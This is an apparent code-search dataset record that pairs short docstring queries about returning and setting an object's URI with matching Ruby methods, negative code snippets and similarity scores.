"def get_property property_name\n \n begin\n \n if @filename == \"\"\n raise \"Base file not specified.\"\n end\n \n if property_name == \"\"\n raise \"Property name not specified.\"\n end\n \n str_uri = $productURI + \"/words/\" + @filename + \"/documentProperties/\" + property_name\n signed_str_uri = Common::Utils.sign(str_uri)\n \n response_stream = RestClient.get(signed_str_uri,{:accept=>\"application/json\"})\n \n stream_hash = JSON.parse(response_stream)\n \n if(stream_hash[\"Code\"] == 200)\n return stream_hash[\"DocumentProperty\"]\n else\n return false\n end\n \n rescue Exception=>e\n print e\n end\n \n end",
"def get(index)\n properties = index.split('.')\n get_value(properties, props)\n end",
"def get_property(name)\n if @properties[name]\n return @properties[name]\n elsif superdescriptor.is_a?(Descriptor)\n return superdescriptor.get_property(name)\n else\n # Search class-based hierarchy\n clazz = superdescriptor\n while !clazz.nil?\n property = PropertyRegistry.get_property(clazz, name)\n if property\n return property\n end\n \n clazz = clazz.superclass\n end\n end\n end",
"def value\n attributes.fetch(:value)\n end",
"def [](property)\n @assigns[property.to_s]\n end",
"def [](key)\n return unless property?(key)\n if @_wrapper and @_wrapper.class.marshal?(key)\n Marshal.load(String.from_java_bytes(get_property(key.to_s)))\n else\n get_property(key.to_s)\n end\n end",
"def get_property_at_index(propertyIndex,exception = nil)\n res = super(context,self,propertyIndex,exception)\n\n \n val_ref = JS::Value.from_pointer_with_context(context,res)\n ret = val_ref.to_ruby\n if ret.is_a?(JS::Value)\n return check_use(ret) || is_self(ret) || ret\n else\n return check_use(ret) || ret\n end\n \n \n end",
"def property(property_name, options = T.unsafe(nil)); end",
"def property(property_name, options = T.unsafe(nil)); end",
"def create_property_getter(property)\n # meth = property.name\n class_eval <<-EOS, __FILE__, __LINE__ + 1\n def #{property.name}\n self['#{property.name}']\n end\n EOS\n\n if property.type == 'boolean'\n class_eval <<-EOS, __FILE__, __LINE__\n def #{property.name}?\n if self['#{property.name}'].nil? || self['#{property.name}'] == false || self['#{property.name}'].to_s.downcase == 'false'\n false\n else\n true\n end\n end\n EOS\n end\n\n if property.alias\n class_eval <<-EOS, __FILE__, __LINE__ + 1\n alias #{property.alias.to_sym} #{property.name.to_sym}\n EOS\n end\n end",
"def get(param)\n @property_hash[param.intern] || :absent\n end",
"def property( name )\n ( @properties ||= Hash.new )[ name ]\n end",
"def getText\n return getProperty('text').to_s\n end",
"def getvalue\n @variable.get_value @name\n end",
"def get_property(attribute)\n `var el=this.__native__,attr=attribute.__value__,key=c$Element.__keyed_attributes__[attr],bool=c$Element.__boolean_attributes__[attr]`\n `var value=key||bool?el[key||bool]:el.getAttribute(attr,2)`\n return `bool ? !!value : (value==null) ? nil : $q(value)`\n end"
] | [
"0.844763",
"0.8174971",
"0.7957079",
"0.7908404",
"0.7883862",
"0.78775865",
"0.7710518",
"0.76202506",
"0.76007766",
"0.7599103",
"0.7534369",
"0.74720305",
"0.7430656",
"0.7392318",
"0.73604846",
"0.735042",
"0.731903",
"0.7311109",
"0.7249772",
"0.7119159",
"0.70912987",
"0.7075355",
"0.705487",
"0.7039512",
"0.7023578",
"0.70014894",
"0.6968426",
"0.69496226",
"0.69416666",
"0.69402725",
"0.69304216",
"0.68615454",
"0.6850998",
"0.6844094",
"0.68103546",
"0.6807937",
"0.6765857",
"0.67594486",
"0.6737044",
"0.6715325",
"0.67148346",
"0.6703573",
"0.6691636",
"0.6687392",
"0.6655217",
"0.6653096",
"0.6633633",
"0.66183937",
"0.65988386",
"0.65935504",
"0.65857804",
"0.65815294",
"0.6566953",
"0.6539039",
"0.65344554",
"0.6524029",
"0.6521727",
"0.65206164",
"0.65140647",
"0.6496574",
"0.6492155",
"0.6491048",
"0.6484852",
"0.648012",
"0.64723223",
"0.6449743",
"0.64083517",
"0.64074194",
"0.6402676",
"0.63831705",
"0.63831705",
"0.6377086",
"0.63739747",
"0.6372292",
"0.63663",
"0.63621986",
"0.63621986",
"0.63621986",
"0.6351896",
"0.6337745",
"0.63339484",
"0.6332808",
"0.6313623",
"0.62822",
"0.6281085",
"0.6270167",
"0.62417394",
"0.62276816",
"0.621189",
"0.61936",
"0.61912596",
"0.618193",
"0.61767966",
"0.61767966",
"0.61692685",
"0.61663204",
"0.61649454",
"0.61478937",
"0.6140909",
"0.6128709"
] | 0.6808081 | 35 |
Returns a string representation of the APIObject instance (the URI) | def to_s
uri.to_s
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def inspect\n \"#<#{self.class}:#{object_id.to_s(16)} #{uri.inspect}>\"\n end",
"def inspect\n sprintf(\"#<%s:%#0x URI:%s>\", URI.to_s, self.object_id, self.to_s)\n end",
"def inspect\n return sprintf(\n \"#<%s:%#0x URI:%s>\",\n self.class.to_s, self.object_id, self.uri.to_s\n )\n end",
"def to_s\n reconstruct_uri\n end",
"def to_s\n uri_string\n end",
"def to_s\n \"ROD REST API client\"\n end",
"def to_s\n @uri.to_s\n end",
"def to_s\n @uri.to_s\n end",
"def to_s\n self.uri.to_s\n end",
"def to_s\n uri\n end",
"def to_s\n '#<Twilio::REST::FrontlineApi>'\n end",
"def to_s\n @uri\n end",
"def uri\n params = {\n center: location,\n size: size,\n zoom: zoom,\n format: file_format,\n sensor: sensor.to_s\n }\n Addressable::URI.parse(api_endpoint).tap do |uri|\n uri.query_values = params\n end.to_s\n end",
"def to_s\n [\n +\"#<#{self.class}\",\n +\" id=#{id}\",\n +\" uri=#{uri}\",\n +\" endpoints=#{endpoints_string}\",\n +\">\",\n ].join(\"\")\n end",
"def to_s\n @uri\n end",
"def to_s\n\t\t\"#{@api_hash}\"\n\tend",
"def inspect()\n '#<#{self.class}:#{object_id} @url=\\'#{@resturl}\\' @sslcheck=#{@sslcheck} @timeout=#{@timeout}>'\n end",
"def to_s\n @url\n end",
"def to_s\n url\n end",
"def to_s; \"#<Veritable::API url='#{api_base_url}'>\"; end",
"def to_s; @url; end",
"def rest_url_document\n template = ::Addressable::Template.new(current_resource.class.rest_api_document)\n template.expand(property_map).to_s\n end",
"def to_api\n params_as_querystring = @params.marshal_dump.map{ |key|\n k = key.first.to_s.gsub('_', '-')\n v = URI::encode key[1]\n \"%s=%s\" % [k, v]\n }.join(\"&\")\n \"%s?%s\" % ['api/' + @path, params_as_querystring]\n end",
"def to_uri\n build_uri\n end",
"def to_s\n @object.to_s\n end",
"def to_s\n str = ''.dup\n if @scheme\n str << @scheme\n str << ':'\n end\n\n if @opaque\n str << @opaque\n else\n if @host || %w[file postgres].include?(@scheme)\n str << '//'\n end\n if self.userinfo\n str << self.userinfo\n str << '@'\n end\n if @host\n str << @host\n end\n if @port && @port != self.default_port\n str << ':'\n str << @port.to_s\n end\n str << @path\n if @query\n str << '?'\n str << @query\n end\n end\n if @fragment\n str << '#'\n str << @fragment\n end\n str\n end",
"def inspect\n sprintf(\"#<%s:%#0x(%s)>\", self.class.name, __id__, uri.to_s)\n end",
"def inspect\n sprintf(\"#<%s:%#0x(%s)>\", self.class.name, __id__, uri.to_s)\n end",
"def to_s\n object.to_s\n end",
"def to_s\n \"#{http_methods.join(\" / \")} #{path}\"\n end",
"def to_s\n \"#{self.class}#url: #{url}\"\n end",
"def to_s\n url\n end",
"def to_s\n out = \"#{@http_method} #{@uri.request_uri} HTTP/1.1\\r\\n\"\n out << \"host: #{@uri.host}:#{@uri.port}\\r\\n\"\n\n self.http_request.each do |name, value|\n out << \"#{name}: #{value}\\r\\n\" unless name =~ /host/i\n end\n\n out << \"\\r\\n\"\n out << @body.to_s\n end",
"def to_s\n '<Twilio::REST::Api::V2010>';\n end",
"def to_s\n \"#<#{self.class.name}:#{object_id} #{info}>\"\n end",
"def to_s\n [\n (\"#{@protocol}://\" if @protocol),\n (\"#{@userinfo}@\" if @userinfo),\n @host,\n (\":#{@port}\" if @port),\n @registry,\n @path,\n (\"?#{@query}\" if @query),\n (\"##{@fragment}\" if @fragment)\n ].join\n end",
"def uri\n @uri.to_s\n end",
"def to_s\n\t\turl.to_s\n\tend",
"def to_s\n \"#<ArtifactoryApi::Client>\"\n end",
"def to_url\n to_uri.to_s\n end",
"def to_url\n\t\t\tto_uri.to_s\n\t\tend",
"def serialize(object)\n object.to_s\n end",
"def to_s\n \"#<#{self.class.name}:0x#{object_id.to_s(16).rjust(14, \"0\")} host='#{client.host}'>\"\n end",
"def to_s\n ret = {}\n ret[:url] = @url\n ret[:attr] = @attr.to_s\n ret.to_s\n end",
"def inspect\n { method: method, uri: uri.to_s, headers: headers, body: body }.inspect\n end",
"def to_s\n @uri_string ||=\n begin\n uri_string = \"#{normalized_authority}:#{normalized_path}\"\n if uri_string.respond_to?(:force_encoding)\n uri_string.force_encoding(Encoding::UTF_8)\n end\n uri_string\n end\n end",
"def inspect\n \"#<#{self.class.name}:0x#{object_id}\\n @base_url=\\\"#{@base_url}\\\"\\n @most_recent_page=#{@most_recent_page}>\"\n end",
"def to_s\n \"#{@base_url}?#{query}\"\n end",
"def to_s\n \"#{scheme}://#{host}#{path}\"\n end",
"def inspect\n \"#<#{self.class.name}: api_id=#{api_id.inspect}>\"\n end",
"def api_url\n \"#{@@base_url}/#{format}/#{resource}?apikey=#{@@api_key}#{parameters}\"\n end",
"def to_s\n \"#{self.class.to_s}::<#{object_id}> Args: #{args}\"\n end",
"def inspect\n sprintf(\"#<%s:%#0x(%s)>\", self.class.name, __id__, url.to_s)\n end",
"def inspect\n sprintf(\"#<%s:%#0x(%s)>\", self.class.name, __id__, url.to_s)\n end",
"def inspect\n \"#<#{self.class.name}:#{object_id} {path: #{path.inspect}}>\"\n end",
"def to_s\n \"#{base_url}?#{to_query(convert)}\"\n end",
"def build_uri(resource)\n URI(\"#{API_URL}/#{resource}\")\n end",
"def uri\n self + \"\"\n end",
"def uri\n self + \"\"\n end",
"def getURI()\n return @uri.to_s\n end",
"def to_s\n '<Twilio::REST::Proxy::V1>'\n end",
"def to_s\n out = \"#{@http_method} #{@uri.request_uri} HTTP/1.1\\r\\n\"\n out << \"Host: #{@uri.host}:#{@uri.port}\\r\\n\"\n\n http_request.each do |name, value|\n out << \"#{name}: #{value}\\r\\n\" unless name =~ /host/i\n end\n\n out << \"\\r\\n\"\n\n if @body.respond_to?(:read)\n out << @body.read\n elsif Kronk::Multipart === @body\n out << @body.to_io.read\n else\n out << @body.to_s\n end\n end",
"def serialized_path(object); end",
"def serialized_path(object); end",
"def uri_path\n __getobj__.uri.path\n end",
"def to_s\n \"#<#{ self.class.name } name=#{ name.inspect } path=#{ path.to_s }>\"\n end",
"def inspect\n \"#<#{self.class}: #{(uri rescue opts).inspect}>\" \n end",
"def inspect\n \"#<#{self.class}: #{(uri rescue opts).inspect}>\" \n end",
"def inspect\n return \"#<EU:#{path.join(\"/\")}>:#{\"%#x\" % self.object_id}\"\n rescue\n super\n end",
"def to_s\n\n output = \"\"\n\n path = \"/\" + @prefix.join('/')\n @endpoints.each do |route|\n output += \"#{route[:method].to_s.upcase} #{path}\\n\"\n end\n @subroutes.each do |k, subroute|\n output += subroute.to_s\n end\n\n output\n\n end",
"def api_url\n ensure_full_data!\n @gapi[\"selfLink\"]\n end",
"def to_uri info: false\n if info\n URI(_info_uri)\n else\n URI(_http_url)\n end\n end",
"def to_s\n return '' unless scheme && path\n\n uri = \"#{scheme}:/#{path}\"\n\n if query?\n query_string = query.map { |key, value| \"#{key}=#{value}\" }.join('&')\n\n uri += \"?#{query_string}\"\n end\n\n uri\n end",
"def url\n \"/#{self.class.rest_name}s/#{id}\"\n end",
"def to_s\n \"#<\" + self.class.name + \": \" + href + \">\"\n end",
"def to_s\n\t\tres = \"\\nname: \" + name.to_s + \"\\nid: \" + id.to_s + \"\\nservice: \" + service.to_s + \"\\ntitle: \" + title.to_s + \"\\nthumbnail: \" + thumbnail.to_s + \"\\nhref: \" + href.to_s\n\t\tres\n\tend",
"def to_addressable_uri\n @uri\n end",
"def to_s\n @to_s ||= \"http#{http.use_ssl? ? 's' : ''}://#{http.address}:#{http.port}\"\n end",
"def uri\n \"#{@@config[:base_uri]}#{id}\"\n end",
"def url\n uri.to_s\n end",
"def to_s\n @path\n end",
"def inspect #:nodoc:\n \"#<%s:0x%s '%s'>\" % [self.class, object_id, path]\n end",
"def to_s\n @path\n end",
"def uri\n uri_for({}, nil)\n end",
"def inspect\n id_string = (respond_to?(:id) && !id.nil?) ? \" id=#{id}\" : ''\n \"#<#{self.class}:0x#{object_id.to_s(16)}#{id_string}> JSON: \" +\n Clever::JSON.dump(@values, pretty: true)\n end",
"def api_uri\n options.endpoint\n end",
"def to_s\n @path\n end",
"def url\n URI.parse(endpoint).join(path.to_s).to_s\n end",
"def get_uri\n request_object.uri\n end",
"def url\n uri.to_s\n end",
"def to_s\n str = @type.to_s.upcase\n if @uri and not @uri.empty?\n str << \"; URI: #{@uri}\"\n end\n str << \"; line #{@line}\"\n if @message and not @message.empty?\n str << \": #{@message}\"\n end\n return str\n end",
"def to_s\n \"#{self.name} => #{self.link}\"\n end",
"def to_s\n \"#<#{self.class.name}:#{object_id}> @names=#{names}>\"\n end",
"def to_s\n self.ref\n end",
"def to_uri\n URI.parse self\n end",
"def to_s\r\n\t\t\t`#{BITS::BITSADMIN} /info {#{@id}}`\r\n\t\tend",
"def inspect\n String.new('#<').concat(\n self.class.name, ':',\n object_id.to_s, ' ', to_s, '>'\n )\n end",
"def inspect\n String.new('#<').concat(\n self.class.name, ':',\n object_id.to_s, ' ', to_s, '>'\n )\n end",
"def inspect\n String.new('#<').concat(\n self.class.name, ':',\n object_id.to_s, ' ', to_s, '>'\n )\n end",
"def inspect\n String.new('#<').concat(\n self.class.name, ':',\n object_id.to_s, ' ', to_s, '>'\n )\n end"
] | [
"0.74984515",
"0.74076825",
"0.72245973",
"0.7189676",
"0.70629364",
"0.7042799",
"0.7028747",
"0.7028747",
"0.69840956",
"0.6932379",
"0.68574905",
"0.6845644",
"0.6839828",
"0.68012464",
"0.6775751",
"0.6720985",
"0.66213286",
"0.6602574",
"0.6591272",
"0.65530396",
"0.65206367",
"0.650205",
"0.6487595",
"0.64854264",
"0.6481888",
"0.6480297",
"0.63970494",
"0.63970494",
"0.63864",
"0.63811165",
"0.63549",
"0.6346517",
"0.63073033",
"0.6300488",
"0.6299044",
"0.62983495",
"0.62837034",
"0.62798345",
"0.618952",
"0.61874986",
"0.6185512",
"0.6182789",
"0.6161445",
"0.61393917",
"0.6136924",
"0.61132646",
"0.61127466",
"0.61022687",
"0.61017936",
"0.6101124",
"0.61000615",
"0.6098185",
"0.6070859",
"0.6070859",
"0.6049959",
"0.60478055",
"0.6043514",
"0.6037653",
"0.6037653",
"0.60364926",
"0.6034753",
"0.60340095",
"0.6018126",
"0.6018126",
"0.60148764",
"0.6001634",
"0.5982119",
"0.5982119",
"0.59755176",
"0.59712714",
"0.5965021",
"0.5960389",
"0.59575105",
"0.59551895",
"0.59527004",
"0.5950752",
"0.59498125",
"0.5944819",
"0.5922646",
"0.59153575",
"0.59048796",
"0.5904734",
"0.5902748",
"0.59007186",
"0.58936685",
"0.5880047",
"0.58774745",
"0.58772784",
"0.58771616",
"0.58729154",
"0.5867341",
"0.5861548",
"0.5858172",
"0.5836221",
"0.5830759",
"0.58302337",
"0.5830169",
"0.5830169",
"0.5830169",
"0.5830169"
] | 0.69544876 | 9 |
Sets the URI of the object | def uri=(u)
# Remove any format extension (.json, .rdf etc.)
ext = File.extname(u)
@uri = ext.nil? || ext.empty? ? u : u.rpartition(ext)[0]
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def uri=(value)\n @uri = value\n end",
"def uri=(value)\n @uri = value\n end",
"def uri= new_uri\n @uri = self.class.build_uri new_uri\n end",
"def set_uri(base, path)\n @uri = \"#{base}/#{path}/#{self.identifier}\"\n end",
"def uri=(uri)\n @uri = uri.to_s.dup.freeze\n update_uri_with_version\n end",
"def set_uri\n self.uri ||= \"#{DEFAULT_BUCKET_NAME}/#{DEFAULT_PREFIX_BASE}/#{storable.key_prefix}/#{key}\"\n end",
"def uri=(val)\n self.title = self.class.id_from_uri(val)\n if self.title\n self.title = self.title.titleize \n end\n self.uri_path = self.class.scope_from_uri(val)\n end",
"def uri string = nil\n string ? @uri = string : @uri\n end",
"def initialize uri\n self.uri = uri\n end",
"def setup_uri_path\n self.uri_path = self.class.scope_from_uri(self.uri)\n end",
"def uri=(value)\n @uris << value\n end",
"def uri=(_arg0); end",
"def uri=(_arg0); end",
"def uri=(_arg0); end",
"def uri=(_arg0); end",
"def url=(uri)\n @conn = nil\n @url = uri\n end",
"def uri\n read_attr :uri\n end",
"def uri(path=nil)\n (path and @uri = path) or @uri\n end",
"def base_url=(uri)\n @base_uri = uri\n end",
"def uri\n @uri\n end",
"def uri\n @uri\n end",
"def uri=(url)\n @uri = URI.parse(url)\n if (with && !connection.request_body_permitted?)\n @uri.query = with\n end\n end",
"def uri\n @uri\n end",
"def uri\n @uri\n end",
"def set_url\n url 'set'\n end",
"def uri\n @_uri ||= URI(@url)\n end",
"def uri\n @_uri ||= URI(@url)\n end",
"def create_uri\n end",
"def uri\n \n end",
"def base_uri=(uri)\n # If the baseUri does not end with a slash, we must add it\n uri += '/' unless uri[-1] == '/'\n @base_uri = uri\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def update!(**args)\n @uri = args[:uri] if args.key?(:uri)\n end",
"def initialize(uri:)\n @uri = uri\n end",
"def data_uri=(uri)\n assign_data_uri(uri)\n @data_uri = uri\n end",
"def set_urij\n @urij = Urij.find(params[:id])\n end",
"def uri\n self + \"\"\n end",
"def uri\n self + \"\"\n end",
"def set_url\n @url = DEFAULT_URL\n end",
"def url=(value)\n if value.nil?\n @url = nil\n else\n @url = Addressable::URI.parse(value)\n @url.path << '/' unless @url.path.end_with?('/')\n end\n end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri; end",
"def uri\n raise NotImplementedError\n end",
"def request_path(*args)\n if has_attribute? :uri then uri else super end\n end",
"def get\n uri\n super()\n end",
"def get\n uri\n super()\n end",
"def get\n uri\n super()\n end",
"def uri\n @uri_parameters = {:s => @company}\n super() \n end",
"def uri\n N::URI.new(self[:uri])\n end",
"def uri\n N::URI.new(self[:uri])\n end",
"def set_base_uri(uri)\n @base_api_uri = uri\n end",
"def uri\n \"#{base_uri}#{path}\"\n end",
"def base_uri=(uri)\n s9_document_builder.setBaseURI(java.net.URI.new(uri.to_s))\n end",
"def uri(string)\n return if string.blank?\n\n string = URI(string) unless string.is_a?(URI)\n\n # Rewrite host if necessary\n return string unless MetalArchives.config.endpoint\n\n endpoint = URI(MetalArchives.config.endpoint)\n\n string\n .tap { |u| u.host = endpoint.host }\n .tap { |u| u.scheme = endpoint.scheme }\n .tap { |u| u.port = endpoint.port }\n end",
"def uri\n nil\n end",
"def uri\n attributes.fetch(:uri)\n end",
"def uri\n attributes.fetch(:uri)\n end",
"def uri!\n @uri = URI.parse \"#{@config.http_scheme}://#{@config.host}:#{@config.port}/api/#{@config.api_version}/\"\n end",
"def router_uri_prefix=(uri_prefix)\n if respond_to?(:uri=)\n self.uri = (uri_prefix.empty? ? '/' : uri_prefix)\n end\n @router_uri_prefix = uri_prefix\n end",
"def set_uriy\n @uriy = Uriy.find(params[:id])\n end",
"def uri\n ::Spyke::Path.new(@uri_template, fmrest_uri_attributes) if @uri_template\n end",
"def setURL(url)\r\n\t\t\t\t\t@url = url\r\n\t\t\t\tend",
"def setURL(url)\r\n\t\t\t\t\t@url = url\r\n\t\t\t\tend",
"def setURL(url)\r\n\t\t\t\t\t@url = url\r\n\t\t\t\tend",
"def setURL(url)\r\n\t\t\t\t\t@url = url\r\n\t\t\t\tend",
"def setURL(url)\r\n\t\t\t\t\t@url = url\r\n\t\t\t\tend",
"def uri= uri_or_string\n if uri_or_string.respond_to?(:host)\n @uri = uri_or_string\n else\n string = uri_or_string =~ /^http/ ? uri_or_string : 'http://' + uri_or_string.to_s\n @uri = URI.parse(string)\n end\n @server = Net::HTTP.new(uri.host, uri.port)\n end",
"def location= uri\n native.open uri\n end",
"def uri(options = {})\n options[\"uri\"] || build_uri(options)\n end",
"def uri\n return @uri\n end",
"def uri\n return @uri\n end",
"def uri\n\t\turi = self.directory.uri\n\t\turi.dn = self.dn\n\t\treturn uri\n\tend",
"def uri\n opts[:uri]\n end",
"def uri\n @uri.to_s\n end",
"def into(uri)\n @into = RDF::URI(uri)\n self\n end",
"def base_uri=(new_base_uri)\n @base_uri = new_base_uri\n end",
"def update_uri(p)\n update_attribute(:uri_actual, p)\n end"
] | [
"0.79979783",
"0.79979783",
"0.7790412",
"0.77748376",
"0.72962356",
"0.71812826",
"0.70826846",
"0.6975819",
"0.6934346",
"0.68815947",
"0.6829507",
"0.6769047",
"0.6769047",
"0.6769047",
"0.6769047",
"0.6746032",
"0.6729175",
"0.6725151",
"0.6725106",
"0.67051774",
"0.67051774",
"0.66986465",
"0.6665878",
"0.6665878",
"0.6605784",
"0.66046935",
"0.66046935",
"0.6566116",
"0.6525674",
"0.64927346",
"0.6487851",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.64875704",
"0.648739",
"0.648208",
"0.6478901",
"0.6478775",
"0.6471745",
"0.6471745",
"0.646927",
"0.6464111",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.64579123",
"0.6455794",
"0.64408493",
"0.64384466",
"0.64384466",
"0.64384466",
"0.6433005",
"0.6423741",
"0.6423741",
"0.642206",
"0.6418566",
"0.6416862",
"0.6411512",
"0.64072675",
"0.63954943",
"0.63954943",
"0.6375698",
"0.6321739",
"0.6320056",
"0.6305459",
"0.6304524",
"0.6304524",
"0.6304524",
"0.6304524",
"0.6304524",
"0.6285069",
"0.62516344",
"0.62506187",
"0.6246287",
"0.6246287",
"0.6245358",
"0.6234482",
"0.62112623",
"0.61895984",
"0.61868876",
"0.6186877"
] | 0.67778647 | 11 |
Retrieves and transforms the property value | def get_property_value(value, is_url: false)
# Assume hash values are a type/value pair
if value.is_a?(Hash)
type = value['type']
value = value['value']
else
type = nil
end
# Apply transformations to string properties
value = transform(value, is_url: is_url) if value.is_a?(String)
# If a block is present, return the result of the block
return yield(value, type) if block_given?
# Otherwise return the value
value
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def value\n @property_hash[:value]\n end",
"def property(value)\n merge(property: value.to_s)\n end",
"def get_raw_property_value(name)\n return @property_values[name]\n end",
"def get_property(property)\n get_compound_value(get_value(property))\n end",
"def transform_property_value(value, value_type = nil, is_url: false)\n if is_url\n # Remove HTML-escaped encodings from URLs but avoid full HTML-stripping\n CGI.unescape_html(value)\n elsif STRIP_HTML\n # Strip HTML preserving block-level whitespace\n # - Loofah seems to preserve & " etc. so we remove these with CGI.unescape_html\n text = CGI.unescape_html(Loofah.fragment(value).to_text)\n # Collapse all runs of whitespace to a single space\n text.gsub!(/\\s+/, ' ')\n # Remove leading and trailing whitespace\n text.strip!\n # Return the transformed text\n text\n else\n # Return value as-is\n value\n end\n end",
"def property_converter\n FedoraValue\n end",
"def value\n\t\t# This bizarre construct is done in order to not be reliant\n\t\t# on the inherent assignment-order when using Property.new({...})\n\t\t# since that hash can be ordered anywhich way .daniel\n\t\tif value_id\n\t\t\tvalue_object.value\n\t\telse\t\t\t\n\t\t\t@value\n\t\tend\n\tend",
"def translate_property_value(key)\n return resource_translation_matrix.fetch(key) if resource_translation_matrix &&\n resource_translation_matrix.key?(key)\n\n key.to_s\n end",
"def value\n @casted_value ||= type_cast_value(@value)\n end",
"def value\n send property.type_field\n end",
"def get_property_value(value, is_url: false, &block)\n # Assume hash values are a type/value pair\n if value.is_a?(Hash)\n value_type = value['type']\n value = value['value']\n else\n value_type = nil\n end\n # Apply transformations to string properties\n value = transform_property_value(value, value_type, is_url: is_url) if value.is_a?(String)\n # Return the value or the result of calling the given block on the value\n block ? block.call(value, value_type) : value\n end",
"def map_value(converted_value:)\n calling_mapper.for(\n Property.new(\n value.subject,\n value.key,\n converted_value,\n value.adapter,\n value.resource\n )\n ).result\n end",
"def get\n @value\n end",
"def get(value)\n value\n end",
"def value\n attributes.fetch(:value)\n end",
"def get_value(property_path)\n element = @tree.select(property_path)[0]\n element.nil? ? nil : element.value\n end",
"def get_value(property)\n if @env_properties.get_value(property)\n return @env_properties.get_value(property)\n end\n @file_properties.get_value(property)\n end",
"def process_property\n property.strip!\n value.strip!\n\n self.value = Regexp.last_match(1) if value =~ %r{\\A\"(.*)(?<!\\\\)\"\\z}m\n\n section[property] = typecast(value)\n\n self.property = nil\n self.value = nil\n end",
"def get_value\n @value\n end",
"def get_value\n value\n end",
"def get_value\n value\n end",
"def value\n self.lazy_proc?(@value) ? self.coerce(@value.call) : @value\n end",
"def value\n @value ||= extract_value\n end",
"def make_valuestring\n\t\treturn self.value\n\tend",
"def property\n @property\n end",
"def transform(value)\n value\n end",
"def prop(field, name)\n value = nil\n unless field.nil?\n value = value_by_key(field, name)\n value = value&.html_safe if value.is_a?(String)\n end\n value\n end",
"def property_value(property_key, default_value=nil)\n prop=property(property_key)\n if default_value && property_key=='depth'\n # we're in SQALE.... Keep the text_value\n result = (prop ? prop.text_value : nil)||default_value\n else\n result = (prop ? prop.value : nil)\n unless result\n property_definition=java_definition.getWidgetProperty(property_key)\n result = WidgetProperty.text_to_value(property_definition.defaultValue(), property_definition.type().name()) if property_definition\n end\n end\n result\n end",
"def [](property_name)\n properties[property_name.to_s].value\n end",
"def get_property _property\n send_cmd(\"get_property #{_property}\")\n end",
"def result\n new_values = value.value.map do |val|\n map_value(converted_value: val)\n end\n CompositeProperty.new(new_values)\n end",
"def get\n val\n end",
"def get\n val\n end",
"def untypecasted_value\n read_attribute(:value)\n end",
"def value_for(field)\n value = instance_variable_get(:\"@#{field}\")\n value.nil? ? nil : value.to_s\n end",
"def get_property(property_name)\n value = get() and value[property_name]\n end",
"def get\n data[\"_value\"]\n end",
"def converted_value\n if @converter\n @converter.call(@value)\n else\n @value\n end\n end",
"def convert_property(key, value, direction)\n converted_property(primitive_type(key.to_sym), value, direction)\n end",
"def get_value\n @value \n end",
"def get_property_value(name)\n property = get_property(name)\n \n # Throw error if property doesn't exist\n if property.nil?\n raise StandardError.new(\"Property does not exist: #{name}\")\n end\n\n # Return the property value\n property.get_value(self)\n end",
"def record_value(record, property)\n case record\n when Hash\n record.fetch(property, record[property.field])\n when Resource\n property.get!(record)\n end\n end",
"def value\n parsed_value\n end",
"def value\n if @value\n @value\n else\n @value = resolve( :value )\n end\n end",
"def value\n self['value']\n end",
"def value!\n @value\n end",
"def raw_value\n @value\n end",
"def value\n return @value\n end",
"def value\n return @value\n end",
"def value\n return @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def convert_value(value)\n value\n end",
"def value\r\n @value\r\n end",
"def get_value(owner)\n raw_value = owner.get_raw_property_value(name)\n\n if raw_value.nil?\n return nil\n else\n case type\n when 'string' then raw_value\n when 'integer' then raw_value\n when 'decimal' then raw_value\n when 'length' then \"#{raw_value}px\"\n when 'color' then sprintf('#%06x', raw_value)\n when 'percent' then \"#{(raw_value*100).to_i}%\"\n end\n end\n end",
"def get_property(key)\n self.fetch key\n end",
"def value\n @attributes[:value]\n end",
"def value_raw\n @value\n end",
"def cast_value(value) # :api: public\n value\n end",
"def cast_value\n value.mongoize\n end",
"def value\n to_s\n end",
"def css_value(prop); end",
"def cast_as_value(as_type,as_property)\n if(as_type == :date)\n return \"XMLUtils.dateToXML(#{as_property})\"\n elsif(as_type == :datetime)\n return \"TolDateUtils.toTimeParam(#{as_property})\"\n else\n return as_property\n end\n end",
"def prop(name)\n properties.named(name).first.andand.value\n end",
"def value\n if allows_nil? && properties.values.all?(&:nil?)\n nil\n else\n Hash[properties.map { |key, value| [key, value.value] }]\n end\n end",
"def value\n typecast.present? ? typecasted_value : super\n end",
"def value\n return @val\n end",
"def field_value(field)\n @object.respond_to?(field) ? @object.send(field) : ''\n end",
"def get(property)\n self.send(property.to_sym)\n end",
